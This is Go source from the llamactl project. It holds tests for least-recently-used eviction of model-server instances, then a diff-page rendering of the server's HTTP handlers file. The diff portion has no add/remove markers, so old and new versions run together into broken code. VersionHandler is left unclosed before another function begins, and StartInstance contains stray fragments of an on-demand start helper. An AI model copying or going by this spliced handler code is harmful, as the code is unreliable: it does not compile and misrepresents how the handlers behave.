// Cleanup is registered with t.Cleanup so that it also runs when the test
// aborts through t.Fatalf: instances still flagged as running are reset to
// stopped first, and only then is the manager shut down. The original test
// announced a manual shutdown but never called it.
func TestEvictLRUInstance_Success(t *testing.T) {
	mgr := createTestManager()

	var created []*instance.Process
	t.Cleanup(func() {
		// No real process backs these instances, so clear the running flag
		// before asking the manager to shut down.
		for _, inst := range created {
			if inst.IsRunning() {
				inst.SetStatus(instance.Stopped)
			}
		}
		mgr.Shutdown()
	})

	// newOptions returns options with idle timeout enabled; the exact value
	// does not matter for LRU selection, it only has to be > 0.
	newOptions := func(model string) *instance.CreateInstanceOptions {
		timeout := 1
		return &instance.CreateInstanceOptions{
			BackendType: backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &llamacpp.LlamaServerOptions{
				Model: model,
			},
			IdleTimeout: &timeout,
		}
	}

	inst1, err := mgr.CreateInstance("instance-1", newOptions("/path/to/model1.gguf"))
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}
	created = append(created, inst1)

	inst2, err := mgr.CreateInstance("instance-2", newOptions("/path/to/model2.gguf"))
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}
	created = append(created, inst2)

	inst3, err := mgr.CreateInstance("instance-3", newOptions("/path/to/model3.gguf"))
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}
	created = append(created, inst3)

	// Share one mock clock and flag every instance as running.
	mockTime := NewMockTimeProvider(time.Now())
	for _, inst := range created {
		inst.SetTimeProvider(mockTime)
	}
	for _, inst := range created {
		inst.SetStatus(instance.Running)
	}

	// Stamp last-request times one minute apart: inst1 oldest, inst3 newest.
	inst1.UpdateLastRequestTime()
	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
	inst2.UpdateLastRequestTime()
	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
	inst3.UpdateLastRequestTime()

	// The least recently used instance is inst1.
	if err := mgr.EvictLRUInstance(); err != nil {
		t.Fatalf("EvictLRUInstance failed: %v", err)
	}

	if inst1.IsRunning() {
		t.Error("Expected instance-1 to be stopped after eviction")
	}
	if !inst2.IsRunning() {
		t.Error("Expected instance-2 to still be running")
	}
	if !inst3.IsRunning() {
		t.Error("Expected instance-3 to still be running")
	}
}
// TestEvictLRUInstance_NoEligibleInstances checks EvictLRUInstance when there
// is nothing (or only some things) it may evict:
//   - no running instances at all,
//   - only running instances created with a zero, negative or absent idle timeout,
//   - a mix, where only the instance with a positive idle timeout may be evicted.
//
// Two fixes over the original: a missing error now aborts the subtest with
// t.Fatal instead of t.Error, because the following err.Error() call would
// panic on a nil error; and the creation helper receives the subtest's own
// *testing.T, since FailNow must be called from the goroutine running that test.
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
	// createInstanceWithTimeout creates an instance with the given idle
	// timeout setting and fails the calling (sub)test if creation fails.
	createInstanceWithTimeout := func(t *testing.T, mgr manager.InstanceManager, name, model string, timeout *int) *instance.Process {
		t.Helper()
		options := &instance.CreateInstanceOptions{
			BackendType: backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &llamacpp.LlamaServerOptions{
				Model: model,
			},
			IdleTimeout: timeout,
		}
		inst, err := mgr.CreateInstance(name, options)
		if err != nil {
			t.Fatalf("CreateInstance failed: %v", err)
		}
		return inst
	}

	t.Run("no running instances", func(t *testing.T) {
		mgr := createTestManager()
		defer mgr.Shutdown()

		err := mgr.EvictLRUInstance()
		if err == nil {
			// Fatal, not Error: err.Error() below would dereference nil.
			t.Fatal("Expected error when no running instances exist")
		}
		if err.Error() != "failed to find lru instance" {
			t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
		}
	})

	t.Run("only instances without timeout", func(t *testing.T) {
		mgr := createTestManager()
		defer mgr.Shutdown()

		// Instances with various non-eligible timeout configurations.
		zeroTimeout := 0
		negativeTimeout := -1
		inst1 := createInstanceWithTimeout(t, mgr, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
		inst2 := createInstanceWithTimeout(t, mgr, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
		inst3 := createInstanceWithTimeout(t, mgr, "no-timeout-3", "/path/to/model3.gguf", nil)

		// Flag the instances as running.
		instances := []*instance.Process{inst1, inst2, inst3}
		for _, inst := range instances {
			inst.SetStatus(instance.Running)
		}
		defer func() {
			// Runs before the deferred Shutdown: reset to stopped to avoid shutdown panics.
			for _, inst := range instances {
				inst.SetStatus(instance.Stopped)
			}
		}()

		// Eviction must fail because no instance is eligible.
		err := mgr.EvictLRUInstance()
		if err == nil {
			// Fatal, not Error: err.Error() below would dereference nil.
			t.Fatal("Expected error when no eligible instances exist")
		}
		if err.Error() != "failed to find lru instance" {
			t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
		}

		// Every instance must still be running.
		for i, inst := range instances {
			if !inst.IsRunning() {
				t.Errorf("Expected instance %d to still be running", i+1)
			}
		}
	})

	t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
		mgr := createTestManager()
		defer mgr.Shutdown()

		// One instance with timeout enabled, two with it disabled.
		validTimeout := 1
		zeroTimeout := 0
		instWithTimeout := createInstanceWithTimeout(t, mgr, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
		instNoTimeout1 := createInstanceWithTimeout(t, mgr, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
		instNoTimeout2 := createInstanceWithTimeout(t, mgr, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)

		// Flag all instances as running and stamp a request time.
		instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
		for _, inst := range instances {
			inst.SetStatus(instance.Running)
			inst.UpdateLastRequestTime()
		}
		defer func() {
			// Runs before the deferred Shutdown: reset to stopped to avoid shutdown panics.
			for _, inst := range instances {
				if inst.IsRunning() {
					inst.SetStatus(instance.Stopped)
				}
			}
		}()

		// Only the instance with a timeout may be chosen.
		err := mgr.EvictLRUInstance()
		if err != nil {
			t.Fatalf("EvictLRUInstance failed: %v", err)
		}

		if instWithTimeout.IsRunning() {
			t.Error("Expected with-timeout instance to be stopped after eviction")
		}
		if !instNoTimeout1.IsRunning() {
			t.Error("Expected no-timeout-1 instance to still be running")
		}
		if !instNoTimeout2.IsRunning() {
			t.Error("Expected no-timeout-2 instance to still be running")
		}
	})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,795 +1,115 @@
package server
import (
"bytes"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"llamactl/pkg/validation"
"log"
"net/http"
"os/exec"
"strconv"
"strings"
"time"
"github.com/go-chi/chi/v5"
)
// errorResponse represents an error response returned by the API.
// It is the JSON body that writeError encodes.
type errorResponse struct {
// Error carries the value passed to writeError as "code".
Error string `json:"error"`
// Details carries optional extra text; it is omitted from the JSON when empty.
Details string `json:"details,omitempty"`
}
// writeError sends an errorResponse as JSON with the given HTTP status.
// code fills the "error" field and details fills the optional "details"
// field. An encoding failure is logged; nothing further is sent to the client.
func writeError(w http.ResponseWriter, status int, code, details string) {
	payload := errorResponse{Error: code, Details: details}

	w.Header().Set("Content-Type", "application/json")
	w.WriteHeader(status)

	encodeErr := json.NewEncoder(w).Encode(payload)
	if encodeErr == nil {
		return
	}
	log.Printf("Failed to encode error response: %v", encodeErr)
}
// writeJSON writes a JSON response with the specified HTTP status code
func writeJSON(w http.ResponseWriter, status int, data any) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
if err := json.NewEncoder(w).Encode(data); err != nil {
log.Printf("Failed to encode JSON response: %v", err)
}
}
// writeText writes a plain text response with the specified HTTP status code
func writeText(w http.ResponseWriter, status int, data string) {
w.Header().Set("Content-Type", "text/plain")
w.WriteHeader(status)
if _, err := w.Write([]byte(data)); err != nil {
log.Printf("Failed to write text response: %v", err)
}
}
// Handler provides HTTP handlers for the llamactl server API
type Handler struct {
// InstanceManager is the backend that the handlers delegate instance operations to.
InstanceManager manager.InstanceManager
// cfg is the application configuration supplied to NewHandler.
cfg config.AppConfig
// httpClient is created by NewHandler with a 30 second timeout.
httpClient *http.Client
}
// NewHandler returns a Handler wired to the given instance manager and
// application configuration. The handler gets its own HTTP client with a
// 30 second timeout.
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
	client := &http.Client{Timeout: 30 * time.Second}

	h := &Handler{
		InstanceManager: im,
		cfg:             cfg,
		httpClient:      client,
	}
	return h
}
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
// getInstance resolves the instance addressed by the request.
// The name is read from the "name" URL path parameter, validated, and then
// looked up through the instance manager. Validation and lookup failures are
// returned as wrapped errors.
func (h *Handler) getInstance(r *http.Request) (*instance.Instance, error) {
	validatedName, err := validation.ValidateInstanceName(chi.URLParam(r, "name"))
	if err != nil {
		return nil, fmt.Errorf("invalid instance name: %w", err)
	}

	found, err := h.InstanceManager.GetInstance(validatedName)
	if err != nil {
		return nil, fmt.Errorf("failed to get instance by name: %w", err)
	}
	return found, nil
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput()
if err != nil {
http.Error(w, "Failed to get help: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/plain")
w.Write(output)
// ensureInstanceRunning ensures the instance is running by starting it if on-demand start is enabled
// It handles LRU eviction when the maximum number of running instances is reached
func (h *Handler) ensureInstanceRunning(inst *instance.Instance) error {
options := inst.GetOptions()
allowOnDemand := options != nil && options.OnDemandStart != nil && *options.OnDemandStart
if !allowOnDemand {
return fmt.Errorf("instance is not running and on-demand start is not enabled")
}
}
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		// Run "llama-server --version" and relay its combined stdout/stderr.
		out, runErr := exec.Command("llama-server", "--version").CombinedOutput()
		if runErr != nil {
			http.Error(w, "Failed to get version: "+runErr.Error(), http.StatusInternalServerError)
			return
		}

		w.Header().Set("Content-Type", "text/plain")
		w.Write(out)
	}
}
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		// Run "llama-server --list-devices" and relay its combined stdout/stderr.
		out, runErr := exec.Command("llama-server", "--list-devices").CombinedOutput()
		if runErr != nil {
			http.Error(w, "Failed to list devices: "+runErr.Error(), http.StatusInternalServerError)
			return
		}

		w.Header().Set("Content-Type", "text/plain")
		w.Write(out)
	}
}
// ListInstances godoc
// @Summary List all instances
// @Description Returns a list of all instances managed by the server
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		all, listErr := h.InstanceManager.ListInstances()
		if listErr != nil {
			http.Error(w, "Failed to list instances: "+listErr.Error(), http.StatusInternalServerError)
			return
		}

		// Reply with the manager's list encoded as JSON.
		w.Header().Set("Content-Type", "application/json")
		encodeErr := json.NewEncoder(w).Encode(all)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instances: "+encodeErr.Error(), http.StatusInternalServerError)
		}
	}
}
// CreateInstance godoc
// @Summary Create and start a new instance
// @Description Creates a new instance with the provided configuration options
// @Tags instances
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post]
func (h *Handler) CreateInstance() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if instanceName == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		// The request body carries the creation options as JSON.
		options := new(instance.CreateInstanceOptions)
		if decodeErr := json.NewDecoder(r.Body).Decode(options); decodeErr != nil {
			http.Error(w, "Invalid request body", http.StatusBadRequest)
			return
		}

		created, createErr := h.InstanceManager.CreateInstance(instanceName, options)
		if createErr != nil {
			http.Error(w, "Failed to create instance: "+createErr.Error(), http.StatusInternalServerError)
			return
		}

		// Reply 201 with the created instance encoded as JSON.
		w.Header().Set("Content-Type", "application/json")
		w.WriteHeader(http.StatusCreated)
		encodeErr := json.NewEncoder(w).Encode(created)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
		}
	}
}
// GetInstance godoc
// @Summary Get details of a specific instance
// @Description Returns the details of a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get]
func (h *Handler) GetInstance() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if instanceName == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		found, lookupErr := h.InstanceManager.GetInstance(instanceName)
		if lookupErr != nil {
			http.Error(w, "Failed to get instance: "+lookupErr.Error(), http.StatusInternalServerError)
			return
		}

		// Reply with the instance encoded as JSON.
		w.Header().Set("Content-Type", "application/json")
		encodeErr := json.NewEncoder(w).Encode(found)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
		}
	}
}
// UpdateInstance godoc
// @Summary Update an instance's configuration
// @Description Updates the configuration of a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put]
func (h *Handler) UpdateInstance() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if instanceName == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		// The request body carries the new options as JSON.
		options := new(instance.CreateInstanceOptions)
		if decodeErr := json.NewDecoder(r.Body).Decode(options); decodeErr != nil {
			http.Error(w, "Invalid request body", http.StatusBadRequest)
			return
		}

		updated, updateErr := h.InstanceManager.UpdateInstance(instanceName, options)
		if updateErr != nil {
			http.Error(w, "Failed to update instance: "+updateErr.Error(), http.StatusInternalServerError)
			return
		}

		// Reply with the updated instance encoded as JSON.
		w.Header().Set("Content-Type", "application/json")
		encodeErr := json.NewEncoder(w).Encode(updated)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
		}
	}
}
// StartInstance godoc
// @Summary Start a stopped instance
// @Description Starts a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post]
func (h *Handler) StartInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
return fmt.Errorf("cannot start instance, failed to evict instance: %w", err)
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// StopInstance godoc
// @Summary Stop a running instance
// @Description Stops a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post]
func (h *Handler) StopInstance() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if instanceName == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		stopped, stopErr := h.InstanceManager.StopInstance(instanceName)
		if stopErr != nil {
			http.Error(w, "Failed to stop instance: "+stopErr.Error(), http.StatusInternalServerError)
			return
		}

		// Reply with the stopped instance encoded as JSON.
		w.Header().Set("Content-Type", "application/json")
		encodeErr := json.NewEncoder(w).Encode(stopped)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
		}
	}
}
// RestartInstance godoc
// @Summary Restart a running instance
// @Description Restarts a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post]
func (h *Handler) RestartInstance() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if instanceName == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		restarted, restartErr := h.InstanceManager.RestartInstance(instanceName)
		if restartErr != nil {
			http.Error(w, "Failed to restart instance: "+restartErr.Error(), http.StatusInternalServerError)
			return
		}

		// Reply with the restarted instance encoded as JSON.
		w.Header().Set("Content-Type", "application/json")
		encodeErr := json.NewEncoder(w).Encode(restarted)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instance: "+encodeErr.Error(), http.StatusInternalServerError)
		}
	}
}
// DeleteInstance godoc
// @Summary Delete an instance
// @Description Stops and removes a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 204 "No Content"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [delete]
func (h *Handler) DeleteInstance() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if instanceName == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		deleteErr := h.InstanceManager.DeleteInstance(instanceName)
		if deleteErr != nil {
			http.Error(w, "Failed to delete instance: "+deleteErr.Error(), http.StatusInternalServerError)
			return
		}

		// Success carries no body.
		w.WriteHeader(http.StatusNoContent)
	}
}
// GetInstanceLogs godoc
// @Summary Get logs from a specific instance
// @Description Returns the logs from a specific instance by name with optional line limit
// @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Param lines query string false "Number of lines to retrieve (default: all lines)"
// @Produce text/plain
// @Success 200 {string} string "Instance logs"
// @Failure 400 {string} string "Invalid name format or lines parameter"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/logs [get]
func (h *Handler) GetInstanceLogs() http.HandlerFunc {
	// The handler returns the logs of the instance named by the "name" URL
	// parameter as text/plain. The optional "lines" query parameter is parsed
	// as an integer and passed to GetLogs; when absent, -1 is passed.
	return func(w http.ResponseWriter, r *http.Request) {
		instanceName := chi.URLParam(r, "name")
		if len(instanceName) == 0 {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		lineLimit := -1
		if rawLimit := r.URL.Query().Get("lines"); rawLimit != "" {
			parsed, convErr := strconv.Atoi(rawLimit)
			if convErr != nil {
				http.Error(w, "Invalid lines parameter: "+convErr.Error(), http.StatusBadRequest)
				return
			}
			lineLimit = parsed
		}

		target, lookupErr := h.InstanceManager.GetInstance(instanceName)
		if lookupErr != nil {
			http.Error(w, "Failed to get instance: "+lookupErr.Error(), http.StatusInternalServerError)
			return
		}

		logText, logsErr := target.GetLogs(lineLimit)
		if logsErr != nil {
			http.Error(w, "Failed to get logs: "+logsErr.Error(), http.StatusInternalServerError)
			return
		}

		w.Header().Set("Content-Type", "text/plain")
		w.Write([]byte(logText))
	}
}
// ProxyToInstance godoc
// @Summary Proxy requests to a specific instance
// @Description Forwards HTTP requests to the llama-server instance running on a specific port
// @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 200 "Request successfully proxied to instance"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Failure 503 {string} string "Instance is not running"
// @Router /instances/{name}/proxy [get]
// @Router /instances/{name}/proxy [post]
func (h *Handler) ProxyToInstance() http.HandlerFunc {
	// The handler forwards the request to the proxy of the instance named by the
	// "name" URL parameter. It answers 400 for an empty name, 500 when the
	// instance or its proxy cannot be obtained, and 503 when the instance is
	// not running.
	return func(w http.ResponseWriter, r *http.Request) {
		name := chi.URLParam(r, "name")
		if name == "" {
			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
			return
		}

		inst, err := h.InstanceManager.GetInstance(name)
		if err != nil {
			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
			return
		}

		if !inst.IsRunning() {
			http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
			return
		}

		// Get the cached proxy for this instance
		proxy, err := inst.GetProxy()
		if err != nil {
			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
			return
		}

		// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL.
		// TrimPrefix is used instead of slicing by len(prefix): slicing panics
		// when the path is shorter than the prefix and cuts arbitrary bytes when
		// the path does not actually start with it.
		originalPath := r.URL.Path
		prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", name)
		proxyPath := strings.TrimPrefix(originalPath, prefix)

		// Ensure the proxy path starts with "/"
		if !strings.HasPrefix(proxyPath, "/") {
			proxyPath = "/" + proxyPath
		}

		// Update the last request time for the instance
		inst.UpdateLastRequestTime()

		// Rewrite the path for the backend and restore it afterwards so that
		// anything inspecting the request later (e.g. logging) sees the
		// original URL.
		r.URL.Path = proxyPath
		defer func() {
			r.URL.Path = originalPath
		}()

		// Set forwarded headers. For incoming requests net/http moves the Host
		// header into r.Host, so r.Header.Get("Host") would always be empty.
		r.Header.Set("X-Forwarded-Host", r.Host)
		forwardedProto := "http"
		if r.TLS != nil {
			// The client connection to this server was made over TLS.
			forwardedProto = "https"
		}
		r.Header.Set("X-Forwarded-Proto", forwardedProto)

		// Forward the request using the cached proxy
		proxy.ServeHTTP(w, r)
	}
}
// OpenAIListInstances godoc
// @Summary List instances in OpenAI-compatible format
// @Description Returns a list of instances in a format compatible with OpenAI API
// @Tags openai
// @Security ApiKeyAuth
// @Produce json
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/models [get]
func (h *Handler) OpenAIListInstances() http.HandlerFunc {
	// The handler lists every instance known to the manager and reports each
	// one as an OpenAI-style "model" entry inside a "list" envelope.
	return func(w http.ResponseWriter, r *http.Request) {
		all, listErr := h.InstanceManager.ListInstances()
		if listErr != nil {
			http.Error(w, "Failed to list instances: "+listErr.Error(), http.StatusInternalServerError)
			return
		}

		// Pre-size the slice; it stays non-nil so an empty list encodes as [].
		models := make([]OpenAIInstance, 0, len(all))
		for _, current := range all {
			models = append(models, OpenAIInstance{
				ID:      current.Name,
				Object:  "model",
				Created: current.Created,
				OwnedBy: "llamactl",
			})
		}

		w.Header().Set("Content-Type", "application/json")
		payload := OpenAIListInstancesResponse{Object: "list", Data: models}
		encodeErr := json.NewEncoder(w).Encode(payload)
		if encodeErr != nil {
			http.Error(w, "Failed to encode instances: "+encodeErr.Error(), http.StatusInternalServerError)
			return
		}
	}
}
// OpenAIProxy godoc
// @Summary OpenAI-compatible proxy endpoint
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
// @Tags openai
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
	// The handler routes an OpenAI-style request to the instance whose name
	// equals the "model" field of the JSON body. A stopped instance is started
	// on demand when its options allow it, optionally evicting another
	// instance first when the running-instance limit has been reached.
	return func(w http.ResponseWriter, r *http.Request) {
		// Buffer the whole body: the "model" field selects the target instance
		// and the same bytes must be replayed to the backend afterwards.
		bodyBytes, err := io.ReadAll(r.Body)
		if err != nil {
			http.Error(w, "Failed to read request body", http.StatusBadRequest)
			return
		}
		r.Body.Close()

		// Parse the body to extract instance name
		var requestBody map[string]any
		if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
			http.Error(w, "Invalid request body", http.StatusBadRequest)
			return
		}

		modelName, ok := requestBody["model"].(string)
		if !ok || modelName == "" {
			http.Error(w, "Instance name is required", http.StatusBadRequest)
			return
		}

		// Route to the appropriate inst based on instance name
		inst, err := h.InstanceManager.GetInstance(modelName)
		if err != nil {
			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
			return
		}

		if !inst.IsRunning() {
			// Read the options once so the nil checks and the dereference all
			// look at the same value instead of three separate GetOptions calls.
			options := inst.GetOptions()
			allowOnDemand := options != nil && options.OnDemandStart != nil && *options.OnDemandStart
			if !allowOnDemand {
				http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
				return
			}

			if h.InstanceManager.IsMaxRunningInstancesReached() {
				if h.cfg.Instances.EnableLRUEviction {
					err := h.InstanceManager.EvictLRUInstance()
					if err != nil {
						http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
						return
					}
				} else {
					http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
					return
				}
			}

			// If on-demand start is enabled, start the instance
			if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
				http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
				return
			}

			// Wait for the instance to become healthy before proceeding; the
			// wait is bounded by the configured OnDemandStartTimeout.
			if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil {
				http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
				return
			}
		}

		proxy, err := inst.GetProxy()
		if err != nil {
			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
			return
		}

		// Update last request time for the instance
		inst.UpdateLastRequestTime()

		// Recreate the request body from the bytes we read
		r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
		r.ContentLength = int64(len(bodyBytes))

		proxy.ServeHTTP(w, r)
	}
}
// ParseCommandRequest is the JSON request body accepted by the backend
// command-parsing handlers.
type ParseCommandRequest struct {
	// Command is the command string to parse; it is read from the "command" JSON key.
Command string `json:"command"`
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
	// failure is the JSON body sent for every error reply of this handler.
	type failure struct {
		Error   string `json:"error"`
		Details string `json:"details,omitempty"`
	}

